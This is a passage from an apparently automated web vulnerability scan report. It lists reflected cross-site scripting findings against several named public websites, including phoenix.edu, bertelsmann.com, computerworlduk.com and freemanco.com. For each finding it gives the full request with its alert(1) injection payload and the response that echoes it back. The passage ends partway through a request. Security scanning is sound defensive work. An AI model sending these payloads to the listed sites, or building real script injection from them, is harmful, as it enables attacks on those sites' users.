GET /AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=8909-112&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=-X-&postal_code_int=&postal_code=&program_type=&program_type2=1&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=-X-&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no2e90f"%3balert(1)//35db81cf6d89d4995&mvtkey=52D7F2695BDD54B4 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:04:00 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054%2C14771; Domain=.phoenix.edu; Path=/
Set-Cookie: state=-X-; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:18:07 GMT; Path=/
Set-Cookie: plid=47054%7C14771; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:18:07 GMT; Path=/
Set-Cookie: vid=51922115; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 60188

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
l_education|36214_7718_98_95|143206",143060);doDynamicSelect("registered_nurse|36214_7718_98_95|143180|OPTIONAL", doDriveWithBrowserCachedValues("registered_nurse|36214_7718_98_95|143180|OPTIONAL", "no2e90f";alert(1)//35db81cf6d89d4995"),true,"","state|36214_7718_98_95|143098","program_type|36214_7718_98_95|143100","program_type2|36214_7718_98_95|143208","level_education|36214_7718_98_95|143206",143060);doDynamicSelect("state|36214_
...[SNIP]...

5.208. http://www.aptm.phoenix.edu/AptiNet/hhs [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /AptiNet/hhs

Issue detail

The value of the state request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b8d"%3balert(1)//b06b0eb551423d5a9 was submitted in the state parameter. This input was echoed as d2b8d";alert(1)//b06b0eb551423d5a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=8909-112&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=-X-d2b8d"%3balert(1)//b06b0eb551423d5a9&postal_code_int=&postal_code=&program_type=&program_type2=1&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=-X-&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no&mvtkey=52D7F2695BDD54B4 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:57:51 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47054%2C14771; Domain=.phoenix.edu; Path=/
Set-Cookie: state=-X-d2b8d%22%3Balert%281%29%2F%2Fb06b0eb551423d5a9; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:11:58 GMT; Path=/
Set-Cookie: plid=47054%7C14771; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 22:11:58 GMT; Path=/
Set-Cookie: vid=51922123; Domain=.phoenix.edu; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 60234

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
8_98_95|143208","level_education|36214_7718_98_95|143206",143060);doDynamicSelect("state|36214_7718_98_95|143098|OPTIONAL", doDriveWithBrowserCachedValues("state|36214_7718_98_95|143098|OPTIONAL", "-X-d2b8d";alert(1)//b06b0eb551423d5a9"),true,"","program_type|36214_7718_98_95|143100","program_type2|36214_7718_98_95|143208","registered_nurse|36214_7718_98_95|143180","level_education|36214_7718_98_95|143206",143060);doDynamicSelect("p
...[SNIP]...

5.209. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php [language parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/bm/index.php

Issue detail

The value of the language request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60c18"><script>alert(1)</script>5e11220fedb was submitted in the language parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bertelsmann_corp/wms41/bm/index.php?language=260c18"><script>alert(1)</script>5e11220fedb HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:34 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.11
Set-Cookie: BERTELSMANN_CORP_BEESITE=62b7c6f3cc27ed285d02b8941664c2e2; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, no-cache
Pragma: no-cache
P3P: CP="IDC ADM DEV PSAi OUR IND ONL COM NAV"
Last-Modified: Tue, 26 Apr 2011 22:40:34 GMT
Cache-Control: private, no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Bertelsmann - me
...[SNIP]...
<a href="/bertelsmann_corp/wms41/bm/index.php?language=160c18"><script>alert(1)</script>5e11220fedb" class="meta_lang">
...[SNIP]...

5.210. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/bm/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50700"><script>alert(1)</script>e85a0f4245a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bertelsmann_corp/wms41/bm/index.php?language=2&50700"><script>alert(1)</script>e85a0f4245a=1 HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:41:12 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.11
Set-Cookie: BERTELSMANN_CORP_BEESITE=1ec7b6c7fa8e3e05e47369a9b60f5be1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, no-cache
Pragma: no-cache
P3P: CP="IDC ADM DEV PSAi OUR IND ONL COM NAV"
Last-Modified: Tue, 26 Apr 2011 22:41:12 GMT
Cache-Control: private, no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Bertelsmann - me
...[SNIP]...
<a href="/bertelsmann_corp/wms41/bm/index.php?language=1&50700"><script>alert(1)</script>e85a0f4245a=1" class="meta_lang">
...[SNIP]...

5.211. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcc66'-alert(1)-'3bff25cde7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php?stub=all&bcc66'-alert(1)-'3bff25cde7f=1 HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php?language=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200; BERTELSMANN_CORP_BEESITE=39b35850fa2ee734ba8f53c406a7fe0f

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:51 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.11
Set-Cookie: BMAG=e69ebd65a58b59fc43aea91825569f28; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: must-revalidate
Pragma: no-cache
ETag: 56f89593639c0b8aa3c6e845af7f6aa0
Content-Length: 588
Connection: close
Content-Type: text/javascript; charset=utf-8

// Client stub for the ajax_muz_statistics PHP Class
function muz_statistic(callback) {
   mode = 'sync';
   if (callback) { mode = 'async'; }
   this.className = 'muz_statistic';
   this.dispatcher = new HTML_AJAX_Dispatcher(this.className,mode,callback,'/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php?bcc66'-alert(1)-'3bff25cde7f=1','JSON');
}
muz_statistic.prototype = {
   Sync: function() { this.dispatcher.Sync(); },
   Async: function(callback) { this.dispatcher.Async(callback); },
   updateStatistic: function() { return this.d
...[SNIP]...

5.212. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f6b6'-alert(1)-'495846e9164 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security1f6b6'-alert(1)-'495846e9164/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=6230c9946d4f7f8f19aa225e614b1c31725e;path=/
Set-Cookie: JSESSIONID=6230c9946d4f7f8f19aa225e614b1c31725e;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:51:16 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...
<script type="text/javascript">
           tweetmeme_url = 'http://www.computerworlduk.com/news/security1f6b6'-alert(1)-'495846e9164/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss';
           tweetmeme_source = 'computerworlduknews';
           tweetmeme_style = 'compact';
       </script>
...[SNIP]...

5.213. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e0f'-alert(1)-'d59c4c6d91f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability42e0f'-alert(1)-'d59c4c6d91f/?olo=rss HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=6230eb99a08fa0861f926d6c603c3116e2c6;path=/
Set-Cookie: JSESSIONID=6230eb99a08fa0861f926d6c603c3116e2c6;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:51:51 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...
<script type="text/javascript">
           tweetmeme_url = 'http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability42e0f'-alert(1)-'d59c4c6d91f/?olo=rss';
           tweetmeme_source = 'computerworlduknews';
           tweetmeme_style = 'compact';
       </script>
...[SNIP]...

5.214. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac01a'-alert(1)-'1b0ab91431a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss&ac01a'-alert(1)-'1b0ab91431a=1 HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=6230b3aed862f61cf09ff5d36f2ca4d73231;path=/
Set-Cookie: JSESSIONID=6230b3aed862f61cf09ff5d36f2ca4d73231;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:50:15 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...
<script type="text/javascript">
           tweetmeme_url = 'http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss&ac01a'-alert(1)-'1b0ab91431a=1';
           tweetmeme_source = 'computerworlduknews';
           tweetmeme_style = 'compact';
       </script>
...[SNIP]...

5.215. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [olo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The value of the olo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6016'-alert(1)-'c1d90134a6 was submitted in the olo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rssc6016'-alert(1)-'c1d90134a6 HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=623050f4d306140c22f631527f42125e6914;path=/
Set-Cookie: JSESSIONID=623050f4d306140c22f631527f42125e6914;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:49:46 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...
<script type="text/javascript">
           tweetmeme_url = 'http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rssc6016'-alert(1)-'c1d90134a6';
           tweetmeme_source = 'computerworlduknews';
           tweetmeme_style = 'compact';
       </script>
...[SNIP]...

5.216. http://www.freemanco.com/store [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /store

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee62f'%3balert(1)//6bcc834eb was submitted in the from parameter. This input was echoed as ee62f';alert(1)//6bcc834eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /store?from=freemancoee62f'%3balert(1)//6bcc834eb HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://freemanco.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:08:33 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 87200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <hea
...[SNIP]...
t>
   function forgotPassword(){
       var username = $("#loginName").val();
       window.location.href="user/forgetPassword.jsp?username="+username;
   }
   
   $(document).ready(function() {
    var from = 'freemancoee62f';alert(1)//6bcc834eb';
    if(from == 'freemanco'){
    window.location.href="/freemanco";
    }
   });
</script>
...[SNIP]...

5.217. http://www.freemanco.com/store/ [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /store/

Issue detail

The value of the from request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb27d'%3balert(1)//6c9edc3f802 was submitted in the from parameter. This input was echoed as fb27d';alert(1)//6c9edc3f802 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/?from=freemancofb27d'%3balert(1)//6c9edc3f802 HTTP/1.1
Host: www.freemanco.com
Proxy-Connection: keep-alive
Referer: http://freemanco.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E9CC8481786C5EFF84131E72CF4BEDD6.node1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:09:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP06 (build: SVNTag=JBPAPP_4_2_0_GA_CP06 date=200902191208)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xIFsgRFBTTGljZW5zZS8wICBd
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 87202


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
   <hea
...[SNIP]...
t>
   function forgotPassword(){
       var username = $("#loginName").val();
       window.location.href="user/forgetPassword.jsp?username="+username;
   }
   
   $(document).ready(function() {
    var from = 'freemancofb27d';alert(1)//6c9edc3f802';
    if(from == 'freemanco'){
    window.location.href="/freemanco";
    }
   });
</script>
...[SNIP]...

5.218. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The value of the _IG_CALLBACK request parameter is copied into the HTML document as plain text between tags. The payload 466b0<script>alert(1)</script>06150d728a4 was submitted in the _IG_CALLBACK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0
Content-Length: 5561

